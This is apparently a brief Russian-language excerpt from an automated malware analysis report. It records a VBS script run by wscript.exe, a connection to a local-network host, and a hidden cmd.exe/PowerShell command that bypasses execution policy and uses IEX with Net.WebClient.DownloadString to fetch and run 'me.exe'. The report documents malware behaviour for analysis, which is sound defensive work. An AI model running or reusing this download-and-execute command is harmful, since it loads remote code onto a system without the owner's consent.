Техническая информация
- http://19#.168.7.1/try/me.exe
- <Текущая директория>\test_2.vbs
- '<LOCALNET>.7.1':80
- ClassName: 'EDIT' WindowName: ''
- '<SYSTEM32>\wscript.exe' "<Текущая директория>\test_2.vbs"
- '<SYSTEM32>\cmd.exe' /C powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://19#.168.7.1/try/me.exe')";x (со скрытым окном)